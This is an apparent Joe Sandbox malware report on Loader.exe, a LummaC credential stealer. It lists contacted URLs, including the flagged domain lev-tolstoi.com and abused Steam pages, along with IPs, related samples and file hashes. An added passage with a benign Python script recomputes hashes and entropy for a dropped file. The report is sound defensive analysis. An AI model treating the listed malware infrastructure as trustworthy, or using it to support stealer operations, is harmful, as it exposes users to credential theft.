                                                                                                                                                          https://help.staspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/about/aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://checkout.steampowaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://help.steampowered.com/en/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://steamcommunity.com/market/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/news/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.coaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://recaptcha.net/recaptcha/;aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://lev-tolstoi.com/uoaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003533000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                unknown
                                                                                                                                                                                https://lev-tolstoi.com/apisaspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://login.steampaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/stats/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://medal.tvaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aaspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://store.steampowered.com/steam_refunds/aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://x1.c.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://x1.i.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aaspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=easpnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpfalse
high

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://community.fastly.st | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://steamcommunity.com/workshop/ | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://login.steampowered.com/ | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://support.mozilla.org/products/firefoxgro.all | aspnet_regiis.exe, 00000003.00000003.2151871047.0000000005D24000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c | aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://store.steampowered.com/legal/ | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://sketchfab.b | aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false |
| 23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581746
Start date and time: 2024-12-28 22:04:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Loader.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/2@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 37
• Number of non-executed functions: 106
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 16:05:01 | API Interceptor | 12x Sleep call for process: aspnet_regiis.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| 172.67.157.254 | MPgkx6bQIQ.exe | malicious | LummaC |
| 172.67.157.254 | l0zocrLiVW.exe | malicious | LummaC |
| 172.67.157.254 | XYQ1pqHNiT.exe | malicious | LummaC |
| 172.67.157.254 | 5Z19n7XRT1.exe | malicious | LummaC |
| 172.67.157.254 | TdloJt4gY3.exe | malicious | LummaC |
| 172.67.157.254 | 726odELDs8.exe | malicious | LummaC |
| 172.67.157.254 | Tqa1vDp9NT.exe | malicious | LummaC |
| 172.67.157.254 | YrWaRb0IKJ.exe | malicious | LummaC |
| 172.67.157.254 | FfcoO2Giru.exe | malicious | LummaC |
| 172.67.157.254 | k7T6akLcAr.exe | malicious | LummaC |
| 23.55.153.106 | iien1HBbB3.exe | malicious | LummaC |
| 23.55.153.106 | oe9KS7ZHUc.exe | malicious | LummaC |
| 23.55.153.106 | MPgkx6bQIQ.exe | malicious | LummaC |
| 23.55.153.106 | l0zocrLiVW.exe | malicious | LummaC |
| 23.55.153.106 | SQHE4Hsjo6.exe | malicious | LummaC |
| 23.55.153.106 | XYQ1pqHNiT.exe | malicious | LummaC |
| 23.55.153.106 | GHXsFkoroU.exe | malicious | LummaC |
| 23.55.153.106 | 5Z19n7XRT1.exe | malicious | LummaC |
| 23.55.153.106 | TdloJt4gY3.exe | malicious | LummaC |
| 23.55.153.106 | 3LUyRfIoKs.exe | malicious | LummaC |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| lev-tolstoi.com | Crosshair-X.exe | malicious | LummaC | 104.21.66.86 |
| lev-tolstoi.com | iien1HBbB3.exe | malicious | LummaC | 104.21.66.86 |
| lev-tolstoi.com | oe9KS7ZHUc.exe | malicious | LummaC | 104.21.66.86 |
| lev-tolstoi.com | MPgkx6bQIQ.exe | malicious | LummaC | 172.67.157.254 |
| lev-tolstoi.com | l0zocrLiVW.exe | malicious | LummaC | 172.67.157.254 |
| lev-tolstoi.com | XYQ1pqHNiT.exe | malicious | LummaC | 172.67.157.254 |
| lev-tolstoi.com | GHXsFkoroU.exe | malicious | LummaC | 104.21.66.86 |
| lev-tolstoi.com | 5Z19n7XRT1.exe | malicious | LummaC | 104.21.66.86 |
| lev-tolstoi.com | TdloJt4gY3.exe | malicious | LummaC | 172.67.157.254 |
| lev-tolstoi.com | 3LUyRfIoKs.exe | malicious | LummaC | 104.21.66.86 |
| steamcommunity.com | Crosshair-X.exe | malicious | LummaC | 104.121.10.34 |
| steamcommunity.com | iien1HBbB3.exe | malicious | LummaC | 23.55.153.106 |
| steamcommunity.com | oe9KS7ZHUc.exe | malicious | LummaC | 23.55.153.106 |
| steamcommunity.com | MPgkx6bQIQ.exe | malicious | LummaC | 23.55.153.106 |
| steamcommunity.com | l0zocrLiVW.exe | malicious | LummaC | 23.55.153.106 |
| steamcommunity.com | SQHE4Hsjo6.exe | malicious | LummaC | |
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                GHXsFkoroU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                                TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | iien1HBbB3.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | oe9KS7ZHUc.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | MPgkx6bQIQ.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | l0zocrLiVW.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | SQHE4Hsjo6.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | XYQ1pqHNiT.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | GHXsFkoroU.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 5Z19n7XRT1.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | TdloJt4gY3.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 3LUyRfIoKs.exe | malicious | LummaC | 23.55.153.106
CLOUDFLARENETUS | Crosshair-X.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | setup.msi | malicious | Unknown | 172.67.165.214
CLOUDFLARENETUS | !Set-up..exe | malicious | LummaC Stealer | 172.67.75.40
CLOUDFLARENETUS | !Setup.exe | malicious | LummaC Stealer | 104.26.3.16
CLOUDFLARENETUS | ZZ2sTsJFrt.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
CLOUDFLARENETUS | FB.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh | malicious | Unknown | 104.26.9.163
CLOUDFLARENETUS | http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | Set-up.exe | malicious | LummaC | 104.21.87.112
CLOUDFLARENETUS | test5.exe | malicious | CobaltStrike, Metasploit | 104.21.34.5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Crosshair-X.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | !Set-up..exe | malicious | LummaC Stealer | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | !Setup.exe | malicious | LummaC Stealer | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | Set-up.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | iien1HBbB3.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | SgMuuLxOCJ.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | oe9KS7ZHUc.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | MPgkx6bQIQ.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | l0zocrLiVW.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
a0e9f5d64349fb13191bc781f81f42e1 | SQHE4Hsjo6.exe | malicious | LummaC | 172.67.157.254, 23.55.153.106
No context

Process: C:\Users\user\Desktop\Loader.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 42
Entropy (8bit): 4.0050635535766075
Encrypted: false
SSDEEP: 3:QHXMKa/xwwUy:Q3La/xwQ
MD5: 84CFDB4B995B1DBF543B26B86C863ADC
SHA1: D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256: D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512: 485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
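The record above is one of the few places on the page where the full content of a dropped file is visible: at 42 bytes, the Preview field is the whole file once its two "." pairs are read as the CR LF terminators the File Type line announces. The two lines ("fusion"/"GAC", "WinRT"/"NotApp") are the usage log the .NET CLR writes for a managed executable, which is why the reputation is high even though the file is listed as a drop of the malicious process. The following script is an added check, not part of the Joe Sandbox report: it reconstructs the file bytes from the preview (constructed input), recomputes the size, the 8-bit Shannon entropy that Joe reports, and the MD5/SHA-256, and compares them with the values in the record. The constant names and the `matches_report` helper are my own.

```python
import hashlib
import math
from collections import Counter

# Constructed from the report's Preview field: each "." pair in the preview is
# the CR LF terminator named by the File Type line, which gives exactly 42 bytes.
DROPPED_TEXT = b'1,"fusion","GAC",0\r\n1,"WinRT","NotApp",1\r\n'

# Values copied from the dropped-file record above, for comparison.
REPORTED = {
    "size": 42,
    "entropy": 4.0050635535766075,
    "md5": "84CFDB4B995B1DBF543B26B86C863ADC",
    "sha256": "D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B",
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: -sum(p * log2(p)) over byte values."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe(data: bytes) -> dict:
    """Recompute the fields a sandbox prints for a file: size, entropy, hashes."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def matches_report(data: bytes, reported: dict, tol: float = 1e-9) -> bool:
    """True when every recomputed field agrees with the reported one (hashes case-insensitive)."""
    actual = describe(data)
    return (
        actual["size"] == reported["size"]
        and math.isclose(actual["entropy"], reported["entropy"], abs_tol=tol)
        and actual["md5"] == reported["md5"].lower()
        and actual["sha256"] == reported["sha256"].lower()
    )


if __name__ == "__main__":
    for field, value in describe(DROPPED_TEXT).items():
        print(f"{field}: {value}")
    print("matches report:", matches_report(DROPPED_TEXT, REPORTED))
```

The same `shannon_entropy` function is what you would run over any other drop to interpret the Entropy (8bit) line: plain text like this one sits near 4 bits per byte, while a PE that scores above about 7, as the 650240-byte DLL in the next record does, almost always carries packed or encrypted sections and is the one worth unpacking first.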
Process: C:\Users\user\Desktop\Loader.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 650240
Entropy (8bit): 7.116623244679264
Encrypted: false
SSDEEP: 12288:SYJ4YcxYAzZL8kZIOWhbN4ddlannT5EbJ+vMvb4Yw8kU0khma7Fk:SYGYYlFL8ekmd+Tiaa
MD5: 037BF337C4DE4BC965E3200BEB1A5BE8
SHA1: 317DC2FFCA68CF71652CFFE75D9D2A341A09CDA8
